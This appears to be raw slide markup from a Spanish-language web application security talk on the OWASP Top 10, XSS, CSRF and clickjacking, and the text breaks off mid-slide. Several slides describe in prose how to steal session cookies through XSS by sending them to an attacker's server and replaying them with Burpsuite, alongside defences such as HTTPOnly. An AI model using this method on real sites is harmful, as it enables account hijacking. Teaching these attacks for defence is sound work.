                        </a:rPr>
                        <a:t>Insecure Direct Object Reference</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-US" sz="18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 desarrollador expone una referencia a un objeto interno como parámetro get o post. El atacante puede manipular la referencia para acceder a otros objetos sin autorización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hlinkClick r:id="rId7" tooltip="Top 10 2007-A5"/>
                        </a:rPr>
                        <a:t>Cross Site Request Forgery (CSRF)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 basa en explotar la confianza que tiene la aplicación en sus usuarios. Se aprovecha desde una Web a solicitar una acción en otra Web donde estemos autenticados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OWASP Top 10 2010</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1234975" name="Group 31"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph type="tbl" idx="1"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="788988" y="1320800"/>
          <a:ext cx="7491412" cy="3666744"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="282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Information Leakage and Improper Error Handling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Aplicaciones que proporcionan sin querer información relevante sobre su configuración, funcionamiento interno,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hlinkClick r:id="rId3" tooltip="Top 10 2007-A7"/>
                        </a:rPr>
                        <a:t>Broken Authentication and Session Management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Tokens de sesión y credenciales vulnerables, sin protección o con débilmente protegidas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hlinkClick r:id="rId4" tooltip="Top 10 2007-A8"/>
                        </a:rPr>
                        <a:t>Insecure Cryptographic Storage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Almacenamiento de la información sin cifrar, o con algoritmos no adecuados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hlinkClick r:id="rId5" tooltip="Top 10 2007-A9"/>
                        </a:rPr>
                        <a:t>Insecure Communications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Fallos de las aplicaciones al cifrar las comunicaciones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hlinkClick r:id="rId6" tooltip="Top 10 2007-A10"/>
                        </a:rPr>
                        <a:t>Failure to Restrict URL Access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Aplicaciones que solo protegen el acceso a determinadas partes de la aplicación ocultando los enlaces, si es conocido el enlace es posible acceder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/>
              <a:t>¿Qué aplicaciones Web están afectadas?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/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1138" y="1219200"/>
            <a:ext cx="60356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MITO I: ¿Por qué se van a meter conmigo?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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2513" y="1127125"/>
            <a:ext cx="7221537" cy="499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Desconfía del cliente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sz="2000"/>
              <a:t>Toda la información enviada desde el navegador al Servidor puede ser manipulada, tanto parámetros GET como POST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="2000"/>
              <a:t>La validación JavaScript es correcta desde el punto de vista de la usabilidad, desde el punto de vista de la Seguridad “no vale para nada”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18436" name="Picture 3" descr="disenograficoweb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2200" y="3406775"/>
            <a:ext cx="253682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5300" y="3614738"/>
            <a:ext cx="1192213" cy="1527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 bwMode="auto">
          <a:xfrm>
            <a:off x="4188178" y="4222044"/>
            <a:ext cx="2065867" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/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GET/POST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Desconfía del Cliente</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="disenograficoweb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0" y="2116138"/>
            <a:ext cx="3576638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31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9200" y="1974850"/>
            <a:ext cx="4143375" cy="34639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32700" y="1462088"/>
            <a:ext cx="966788" cy="12398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 bwMode="auto">
          <a:xfrm>
            <a:off x="6041985" y="1907105"/>
            <a:ext cx="1276931" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/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GET/POST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164469" y="1909031"/>
            <a:ext cx="1261646" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/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GET/POST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8897" y="1238492"/>
            <a:ext cx="5683170" cy="350712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 anchorCtr="1"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="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Cliente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384648" y="1194121"/>
            <a:ext cx="1516284" cy="353992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 anchorCtr="1"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="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Servidor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754938" y="2940050"/>
            <a:ext cx="8699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/>
              <a:t>IIS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES"/>
              <a:t>Apache</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr 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55625" y="3033713"/>
            <a:ext cx="111125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/>
              <a:t>IExplorer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES"/>
              <a:t>Firefox</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES"/>
              <a:t>Opera</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES"/>
              <a:t>Netscape</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/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773488" y="3071813"/>
            <a:ext cx="1481137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/>
              <a:t>Burpsuite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES"/>
              <a:t>Achilles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES"/>
              <a:t>Odysseus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES"/>
              <a:t>Tamper Data</a:t>
            </a:r>
          </a:p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41443E-6 L -0.34479 -0.198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" y="-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4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60777E-6 L 4.72222E-6 -0.2266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243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24313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Desconfía del Cliente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Programas embebidos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Applets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> Java, ActiveX, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Shockwave</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> Flash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Sothink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> SWF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Decompiler</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Java </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Decompiler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>VB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Decompiler</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Cifrado en cliente</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Atrise</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Los navegadores necesitan de los métodos y procedimientos para descifrar lo que el servidor le envía, por lo tanto analizando estos datos nosotros también podemos descifrarlo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3988" y="2795588"/>
            <a:ext cx="6210300" cy="2981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9" name="Title 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2660650" y="1506538"/>
            <a:ext cx="6262688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ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0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s-ES" sz="3600" kern="0" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Cross </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" kern="0" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" kern="0" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t> Scripting (XSS)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="36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996950"/>
          </a:xfrm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Definición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001713" y="1487488"/>
            <a:ext cx="7027862" cy="4554537"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="es-ES"/>
              <a:t>Vulnerabilidad presente en una gran cantidad de páginas, hasta convertirse en la número 1 del TOP 10 del 2007</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="es-ES"/>
              <a:t>Muy peligrosa pese a que, por desgracia, se le suele dar poca importancia</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US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2538" y="3349625"/>
            <a:ext cx="3076575" cy="2368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13" y="3349625"/>
            <a:ext cx="3048000" cy="2428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22534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5375" y="3335338"/>
            <a:ext cx="2849563" cy="24066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XSS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XSS Permanente</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>Datos enviados desde el cliente para su almacenamiento en el Servidor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>Datos que van a ser visualizados por otros clientes/usuarios</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>Al devolver los datos el Servidor al navegador cliente se produce la manipulación de la página en el navegador cliente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6922" y="3694384"/>
            <a:ext cx="61436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XSS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XSS no permanente</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>El atacante monta un enlace aprovechando un parámetro vulnerable a XSS donde realiza la manipulación</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>Envía el enlace de alguna manera a la victima (e-mal, foros, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>Twitter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>, etc.) que al hacer clic obtiene la página web “manipulada”</a:t>
            </a:r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0675" y="3611273"/>
            <a:ext cx="59626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Riesgos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Ejecución de código en contexto el usuario que visualiza los datos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Navegación dirigida</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Phising</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Spyware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Robo de credenciales</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Ejecución de acciones automáticas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Defacement</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/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Cross </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> Scripting (XSS)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Robo de Sesiones (XSS)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2765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dirty="0"/>
              <a:t>Mediante esta técnica se puede robar sesiones de una manera bastante sencilla</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Bastaría con realizar un script que llamase a una página alojada en nuestro servidor pasándole la cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Este Script se colaría en el servidor de la victima aprovechando un punto vulnerable a XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Cuando un usuario este </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>logueado</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> en el servidor y ejecute el script se enviara a nuestro servidor el contenido de la cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Una vez que la página obtiene la cookie (almacenándola por ejemplo en un fichero) mediante programas como </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Burpsuite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> se puede hacer una llamada al servidor pasándole la cookie original</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="es-E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MITO I: ¿Por qué se van a meter conmigo?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="5 Imagen" descr="ve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817" y="5936057"/>
            <a:ext cx="1105054" cy="666843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848255" y="6238141"/>
            <a:ext cx="6984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http://www.verizonbusiness.com/resources/security/databreachreport.pdf</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="345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6077" y="1787761"/>
            <a:ext cx="4960398" cy="3861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Robo de Sesiones (XSS)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Por supuesto esta cookie es válida para robar la sesión solo mientras el usuario no cierre la sesión</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp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6565" y="2315185"/>
            <a:ext cx="6525723" cy="4114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Robo de Sesiones (XSS)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2765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evitar el robo de la sesión, mediante ataques XSS se utiliza el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>flagHTTPOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>, que impide el acceso a la cookie desde el navegador, siempre y cuando este lo soporte.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>HTTPOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" u="sng" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://greebo.net/owasp/httponly.php</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/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1198700" y="3811316"/>
          <a:ext cx="10446981" cy="3105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6" name="Documento" r:id="rId5" imgW="5539438" imgH="1646382" progId="Word.Document.12">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Documento" r:id="rId5" imgW="5539438" imgH="164638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700" y="3811316"/>
                        <a:ext cx="10446981" cy="3105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Robo de Sesiones (XSS)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Cross </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Site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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Forgey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> (CSRF)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2765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s-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" dirty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 bwMode="auto">
          <a:xfrm>
            <a:off x="1154113" y="1639888"/>
            <a:ext cx="7027862" cy="46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33557C"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              <a:buChar char="►"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="es-E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Consiste en crear</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="es-E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sitios maliciosos (o manipulados mediante XSS) que realicen peticiones “conocidas” a otros sitios victima.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" marR="0" lvl="0" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1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33557C"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              <a:buChar char="►"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" kern="0" baseline="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Si</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> el usuario navega por el sitio malicioso habiéndose autenticado previamente en el sitio victima se realizará la acción que ejecute la petición.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="es-E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33557C"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              <a:buChar char="►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9878" y="3731673"/>
            <a:ext cx="6587348" cy="272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/>
              <a:t>Clickjacking</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2765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s-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" dirty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 bwMode="auto">
          <a:xfrm>
            <a:off x="1154113" y="1639888"/>
            <a:ext cx="7027862" cy="46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33557C"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              <a:buChar char="►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7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="606128" y="1500461"/>
            <a:ext cx="7027862" cy="46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lvl="0" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="33557C"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Evolución del Cross </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" kern="0" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" kern="0" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" kern="0" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Forgey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> (CSRF).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="33557C"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" kern="0" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> donde se carga una página que requiere de </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" sz="2400" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>autenticación (el usuario </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" sz="2400" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>debe haberse validado </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" sz="2400" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>antes) y se autorizan las </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" sz="2400" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>acciones mediante clics </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" sz="2400" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>(la diferencia con CSRF).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="33557C"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" kern="0" dirty="0">
